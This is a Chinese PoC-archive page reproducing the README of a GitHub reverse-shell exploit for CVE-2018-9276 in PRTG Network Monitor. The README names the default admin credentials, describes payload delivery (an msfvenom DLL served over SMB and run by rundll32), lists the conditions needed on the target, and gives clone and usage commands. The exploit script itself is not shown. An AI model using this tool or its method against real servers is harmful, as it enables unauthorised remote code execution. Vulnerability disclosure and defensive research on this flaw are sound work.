POC详情: 4e36758d1da65a1eb442e1b9099c2ef31809f4e3

来源
https://github.com/wildkindcc/CVE-2018-9276
关联漏洞
标题: Paessler PRTG Network Monitor 操作系统命令注入漏洞 (CVE-2018-9276)
描述:Paessler PRTG Network Monitor是德国Paessler公司的一套网络监控软件。该软件提供使用情况的监测、数据包嗅探、深入分析和简明的报告等功能。 Paessler PRTG Network Monitor 18.2.39之前版本中存在操作系统命令注入漏洞。攻击者可通过发送畸形的参数利用该漏洞执行任意的命令。
描述
CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
介绍
# CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
https://nvd.nist.gov/vuln/detail/CVE-2018-9276

Improved version of an exploit written by https://github.com/M4LV0.  I used the POST data from their script but just made it more reliable as I didnt have much success with it.

Payload delivery is essentially smb_delivery.  Impacket serves up a .dll generated by msfvenom, rundll32.exe does all the work.

Tested on Windows Server 2016 against PRTG 18.1.37.

## Dependancies

By no means is this well written and it's cobbled together from stackoverflow.  This was developed for use with Kali Linux and assumes the following is available:
* Impacket
* Netcat
* Msfvenom

## Assumptions
This is a point and shoot exploit, all you need to know are the admin credentials for the PRTG instance (default prtgadmin:prtgadmin).  Depending on the configuration of the target machiene, your milage may vary.  The following assumptions have been made:
* Target machine is Windows;
* Defender / Applocker is not running; and
* Outbound SMB access is permitted

## Installation


```bash
git clone https://github.com/wildkindcc/CVE-2018-9276.git
python CVE-2018-9276.py -h
```

## Usage
Figure out the credentials and drop shells :)
```python
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
                        [--user USER] [--password PASSWORD] [--https]

optional arguments:
  -h, --help            show this help message and exit
  -i HOST, --host HOST  IP address / Hostname of vulnerable PRTG server
  -p PORT, --port PORT  Port number
  --lhost LHOST         LHOST for MSFVENOM
  --lport LPORT         LPORT for MSFVENOM
  --user USER           Administrator Username
  --password PASSWORD   Administrator Password
  --https               Negotiate SSL connection to the server (Requires
                        socket to be compiled with SSL support)

```
## Disclaimer

This won't let you hack the Gibson.  Do not use this against ANY systems for which you are unauthorised.  I wrote this for fun.  Educational purposes only etc etc.
文件快照

 [4.0K]  /data/pocs/4e36758d1da65a1eb442e1b9099c2ef31809f4e3
├── [ 15K]  CVE-2018-9276.py
└── [2.1K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。